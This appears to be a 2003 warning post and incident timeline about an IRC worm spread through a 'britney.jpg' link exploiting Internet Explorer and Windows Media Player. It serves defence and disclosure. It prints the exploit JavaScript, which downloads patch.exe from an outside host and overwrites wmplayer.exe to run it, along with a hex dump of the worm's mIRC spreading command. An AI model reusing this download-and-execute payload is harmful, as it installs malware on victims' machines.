2003-10-26 15:15 (+0200)
DO NOT CLICK ON britney.jpg!!!
Under no circumstances open an URL that ends with britney.jpg. It is actually
an Internet Explorer / Windows Media Player exploit, as shown below.
-----
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\Program Files\Windows Media Player\wmplayer.exe",2);
location.href = "mms://";
-----
patch.exe seems to be compressed with UPX, interesting strings can be found within.
0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww
0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/
0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri
0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,
0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!
This is a command it sends automatically to mIRC. This causes mIRC to send the
exploit URL to all channels you are in.
It will replace/delete Windows system files. If that happens, you might get a
message of this sort: "Files that are required for Windows to run properly have
been replaced by unrecognized versions".
This is NOT the same thing as http://koti.phnet.fi/jonninen/mircworms/britny.txt.
15:30: At this time I don't know if the worm can be removed. If it manages to delete
your Windows system files, you'll have to reinstall Windows.
15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit they
are hosting.
16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) in
EFnet.
According to reports, simply "repairing" the Windows install or copying the deleted
files back isn't enough, since the virus also messes around with the Windows registry.
You'll have to reinstall Windows.
16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. :-)
16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.
17:00: There's a list of Windows system files in the uncompressed version of patch.exe
starting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,
userinit.exe, services.exe, etc. There are also references to some anti-virus and
firewall programs in the immediate vicinity. The virus probably disables these
programs so that it can roam freely.
Reports say that the virus does not affect Windows 98, but it definitely affects
at least Windows 2000 and XP. Anti-virus software does not help you at this point,
since none of them recognize the virus yet.
The scavenger.sharewith.us site has been disabled. This prevents the virus from
infecting machines for now, but the Angelfire page is still up and the author of
the virus could modify the page to point to another location.
The IE exploit: http://www.security.nnov.ru/search/document.asp?docid=5102
17:30: The virus might not affect Windows Media Player version 8. (see
http://www.kb.cert.org/vuls/id/222044)
19:10: According to reports, the virus does affect WMP 8 as well. Better not open
any suspicious links as long as you use IE.
2003-10-26 19:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.